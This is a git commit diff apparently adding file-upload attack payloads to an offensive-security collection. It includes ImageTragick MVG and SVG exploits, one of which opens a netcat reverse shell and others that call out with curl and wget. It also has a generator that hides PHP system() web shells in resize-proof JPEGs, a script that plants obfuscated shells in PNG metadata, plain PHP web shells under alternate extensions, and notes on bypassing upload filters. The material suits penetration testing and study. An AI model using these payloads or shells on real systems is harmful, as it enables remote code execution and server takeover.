Upload payloads

This commit is contained in:
swisskyrepo 2016-10-18 18:13:23 +07:00
parent a76711ed59
commit 22b68979b4
70 changed files with 233 additions and 9 deletions

View File

@ -6,7 +6,6 @@ TODO:
* Upload
* Traversal Directory
* Tar
* SSRF
* PHP Serialization
* CSV Injection
@ -14,5 +13,6 @@ To improve:
* RCE
* SQL injection
* XXE
* SSRF
# /!\ Work in Progress : 1%

View File

@ -0,0 +1,4 @@
push graphic-context
viewbox 0 0 640 480
fill 'url(http://localhost:PORT/)'
pop graphic-context

View File

@ -0,0 +1,9 @@
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
"http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg&quot;|/bin/nc.traditional 127.0.0.1 4242 -e /bin/bash&quot;"
x="0" y="0" height="640px" width="480px"/>
</svg>

After

Width:  |  Height:  |  Size: 424 B

View File

@ -0,0 +1,4 @@
push graphic-context
viewbox 0 0 640 480
fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "92.222.81.2)'
pop graphic-context

View File

@ -0,0 +1,4 @@
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)'
pop graphic-context

View File

@ -0,0 +1,4 @@
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 92.222.81.2:1337 > /dev/null`'
pop graphic-context

5
Upload/JPG Resize/README.txt Executable file
View File

@ -0,0 +1,5 @@
# How to use
b.php?c=ls
Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l

128
Upload/JPG Resize/bulletjpg.py Executable file
View File

@ -0,0 +1,128 @@
#!/usr/bin/python
"""
Bulletproof Jpegs Generator
Copyright (C) 2012 Damien "virtualabs" Cauquil
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
import struct,sys,os
import gd
from StringIO import StringIO
from random import randint,shuffle
from time import time
# image width/height (square)
N = 32
def insertPayload(_in, _out, payload,off):
"""
Payload insertion (quick JPEG parsing and patching)
"""
img = _in
# look for 'FF DA' (SOS)
sos = img.index("\xFF\xDA")
sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
sod = sos_size+2
# look for 'FF D9' (EOI)
eoi = img[sod:].index("\xFF\xD9")
# enough size ?
if (eoi - sod - off)>=len(payload):
_out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
return True
else:
return False
if __name__=='__main__':
print "[+] Virtualabs' Nasty bulletproof Jpeg generator"
print " | website: http://virtualabs.fr"
print " | contact: virtualabs -at- gmail -dot- com"
print ""
payloads = ["<?php system(/**/$_GET['c'/**/]); ?>","<?php /**/system($_GET[chr(99)/**/]); ?>","<?php system(/**/$_GET[chr(99)]); ?>","<?php\r\nsystem($_GET[/**/'c']);\r\n ?>"]
# make sure the exploit-jpg directory exists or create it
if os.path.exists('exploit-jpg') and not os.path.isdir('exploit-jpg'):
print "[!] Please remove the file named 'exploit-jpg' from the current directory"
elif not os.path.exists('exploit-jpg'):
os.mkdir('exploit-jpg')
# start generation
print '[i] Generating ...'
for q in range(50,100)+[-1]:
# loop over every payload
for p in payloads:
# not done yet
done = False
start = time()
# loop while not done and timeout not reached
while not done and (time()-start)<10.0:
# we create a NxN pixels image, true colors
img = gd.image((N,N),True)
# we create a palette
pal = []
for i in range(N*N):
pal.append(img.colorAllocate((randint(0,256),randint(0,256),randint(0,256))))
# we shuffle this palette
shuffle(pal)
# and fill the image with it
pidx = 0
for x in range(N):
for y in range(N):
img.setPixel((x,y),pal[pidx])
pidx+=1
# write down the image
out_jpg = StringIO('')
img.writeJpeg(out_jpg,q)
out_raw = out_jpg.getvalue()
# now, we try to insert the payload various ways
for i in range(64):
test_jpg = StringIO('')
if insertPayload(out_raw,test_jpg,p,i):
try:
# write down the new jpeg file
f = open('exploit-jpg/exploit-%d.jpg'%q,'wb')
f.write(test_jpg.getvalue())
f.close()
# load it with GD
test = gd.image('exploit-jpg/exploit-%d.jpg'%q)
final_jpg = StringIO('')
test.writeJpeg(final_jpg,q)
final_raw = final_jpg.getvalue()
# does it contain our payload ?
if p in final_raw:
# Yay !
print '[i] Jpeg quality %d ... DONE'%q
done = True
break
except IOError,e:
pass
else:
break
if not done:
# payload not found, we remove the file
os.unlink('exploit-jpg/exploit-%d.jpg'%q)
else:
break

BIN
Upload/JPG Resize/exploit--1.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 KiB

BIN
Upload/JPG Resize/exploit-52.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.1 KiB

BIN
Upload/JPG Resize/exploit-53.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.1 KiB

BIN
Upload/JPG Resize/exploit-54.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.1 KiB

BIN
Upload/JPG Resize/exploit-55.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.1 KiB

BIN
Upload/JPG Resize/exploit-56.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.1 KiB

BIN
Upload/JPG Resize/exploit-57.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.1 KiB

BIN
Upload/JPG Resize/exploit-58.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.1 KiB

BIN
Upload/JPG Resize/exploit-59.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.1 KiB

BIN
Upload/JPG Resize/exploit-60.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.1 KiB

BIN
Upload/JPG Resize/exploit-61.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.1 KiB

BIN
Upload/JPG Resize/exploit-62.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
Upload/JPG Resize/exploit-63.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
Upload/JPG Resize/exploit-64.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
Upload/JPG Resize/exploit-65.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
Upload/JPG Resize/exploit-66.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
Upload/JPG Resize/exploit-67.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
Upload/JPG Resize/exploit-68.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
Upload/JPG Resize/exploit-69.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
Upload/JPG Resize/exploit-70.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
Upload/JPG Resize/exploit-71.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
Upload/JPG Resize/exploit-72.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
Upload/JPG Resize/exploit-73.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 KiB

BIN
Upload/JPG Resize/exploit-74.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 KiB

BIN
Upload/JPG Resize/exploit-75.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 KiB

BIN
Upload/JPG Resize/exploit-76.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 KiB

BIN
Upload/JPG Resize/exploit-77.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 KiB

BIN
Upload/JPG Resize/exploit-78.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 KiB

BIN
Upload/JPG Resize/exploit-79.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 KiB

BIN
Upload/JPG Resize/exploit-80.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.3 KiB

BIN
Upload/JPG Resize/exploit-81.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.4 KiB

BIN
Upload/JPG Resize/exploit-82.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.4 KiB

BIN
Upload/JPG Resize/exploit-83.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.4 KiB

BIN
Upload/JPG Resize/exploit-84.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.4 KiB

BIN
Upload/JPG Resize/exploit-85.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.4 KiB

BIN
Upload/JPG Resize/exploit-86.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.4 KiB

BIN
Upload/JPG Resize/exploit-87.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.5 KiB

BIN
Upload/JPG Resize/exploit-88.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.5 KiB

BIN
Upload/JPG Resize/exploit-89.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.5 KiB

BIN
Upload/JPG Resize/exploit-90.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.6 KiB

BIN
Upload/JPG Resize/exploit-91.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.6 KiB

BIN
Upload/JPG Resize/exploit-92.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.6 KiB

BIN
Upload/JPG Resize/exploit-93.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.7 KiB

BIN
Upload/JPG Resize/exploit-94.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.8 KiB

BIN
Upload/JPG Resize/exploit-95.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.9 KiB

BIN
Upload/JPG Resize/exploit-96.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.9 KiB

BIN
Upload/JPG Resize/exploit-97.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.1 KiB

BIN
Upload/JPG Resize/exploit-98.jpg Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.2 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 994 KiB

BIN
Upload/Metadata GIF/shell_fr.gif Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 407 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 560 KiB

View File

@ -0,0 +1,30 @@
from PIL import Image
# Shellcodes - Bypass included : Keyword Recognition : System, GET, php
# --- How to use : http://localhost/shell.php?c=echo%20'<pre>';ls
#shellcode = "<?=@`$_GET[c]`;"
shellcode = "<?php system($_GET['c']); ?>"
# --- How to use : http://localhost/shell.php?_=system&__=echo%20'<pre>';ls
shellcode2 = "<?='Sh3ll'; $_='{';$_=($_^'<').($_^'>;').($_^'/');?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>"
print "\n[+] Advanced Upload - Shell inside metadatas of a PNG file"
# Create a backdoored PNG
print " - Creating a payload.png"
im = Image.new("RGB", (10,10), "Black")
im.info["shell"] = shellcode
reserved = ('interlace', 'gamma', 'dpi', 'transparency', 'aspect')
# undocumented class
from PIL import PngImagePlugin
meta = PngImagePlugin.PngInfo()
# copy metadata into new object
for k,v in im.info.iteritems():
if k in reserved: continue
meta.add_text(k, v, 0)
im.save("payload.png", "PNG", pnginfo=meta)
print "Done"

Binary file not shown.

After

Width:  |  Height:  |  Size: 116 B

View File

@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>

1
Upload/PHP Extension/Shell.pht Executable file
View File

@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>

View File

@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>

View File

@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>

View File

@ -0,0 +1 @@
<?php echo "Shell";system($_GET['cmd']); ?>

BIN
Upload/PHP Extension/shell.pgif Executable file

Binary file not shown.

After

Width:  |  Height:  |  Size: 407 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 377 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 174 B

View File

@ -1,12 +1,43 @@
# Title
Lorem
## Vuln
# Upload
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
## Exploits
Image Tragik
```
Code
HTTP Request
Reverse Shell
Touch command
```
PHP Extension
```
.php
Less known extension
.pht
.pgif
.phtml
.shtml
Double extension
.jpeg.php
.png.php
```
PNG Bypass a resize - Upload the picture and use a local file inclusion
```
You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
curl 'http://localhost/test.php?0=system' --data "1='ls'"
```
JPG Bypass a resize - Upload the picture and use a local file inclusion
```
http://localhost/test.php?c=ls
```
## Thanks to
* Lorem
* Ipsum
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil